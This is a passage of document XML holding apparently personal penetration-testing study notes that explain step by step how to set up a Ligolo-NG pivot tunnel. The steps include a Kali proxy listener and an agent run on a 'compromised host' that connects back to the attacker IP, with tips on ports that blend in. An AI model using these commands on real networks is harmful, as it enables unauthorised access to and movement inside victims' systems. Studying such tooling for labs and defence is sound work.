      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup Ligolo-NG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006DB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adds a new tun interface to our machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip tuntap add user kali mode tun ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip tuntap add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ creates a new TUN/TAP interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → assigns ownership of this interface to the user kali (so you don’t always need root to manage it).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mode tun </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ creates a TUN interface (layer 3, IP packets). If it was tap, it would operate at layer 2 (Ethernet frames).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ligolo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → name of the new virtual network interface.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enables the new interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip link set ligolo up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip link set</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → manages the state of a network interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ligolo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ the interface name you just created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">up </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ activates/enables the interface (otherwise it’s down and unusable).</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run proxy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(on Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./proxy -selfcert -laddr 0.0.0.0:4443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used port 4443 here instead of 443 since port 443 is important for tools like tcpdump. But if port 4443 doesn’t work, use other common ports like SMB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DON'T USE ANY PORT BELOW 1024 or else u need admin on pivot machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./proxy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ runs the Ligolo‑NG proxy binary (attacker side).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-selfcert </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ generates a self‑signed TLS certificate (so you don’t need to provide your own).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-laddr 0.0.0.0:443</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → listen address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = listen on all interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:443</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = listen on TCP port 443 (common HTTPS port, blends in).</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect ligolo agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on pivot machine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\agent.exe -connect 192.168.45.232:4443 -ignore-cert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1158"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used port 4443 here instead of 443 since port 443 is important for tools like tcpdump. But if port 4443 doesn’t work, use other common ports like SMB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1158"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → runs the Ligolo agent binary on the compromised host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1158"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-connect &lt;IP ADDRESS&gt;:443 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ tells agent to connect back to attacker machine’s IP on port 443.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1158"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-ignore-cert</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → ignore certificate verification (useful since you’re using -selfcert).</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FOR LINUX, If you want to run the agent in the background</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the end of the command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./agent -connect 192.168.45.232:4443 -ignore-cert &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used port 4443 here instead of 443 since port 443 is important for tools like tcpdump. But if port 4443 doesn’t work, use other common ports like SMB</w:t>
      </w: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And then check all backgrounded processes, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1276"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1276"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And to interact with it do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000700">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1276"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg %1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1276"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means go inside of job 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000702">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1276"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then to background it again do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000703">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1276"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000704">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1276"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But this usually stops the agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000705">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000706">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="685800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="320" name="image318.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image318.png"/>
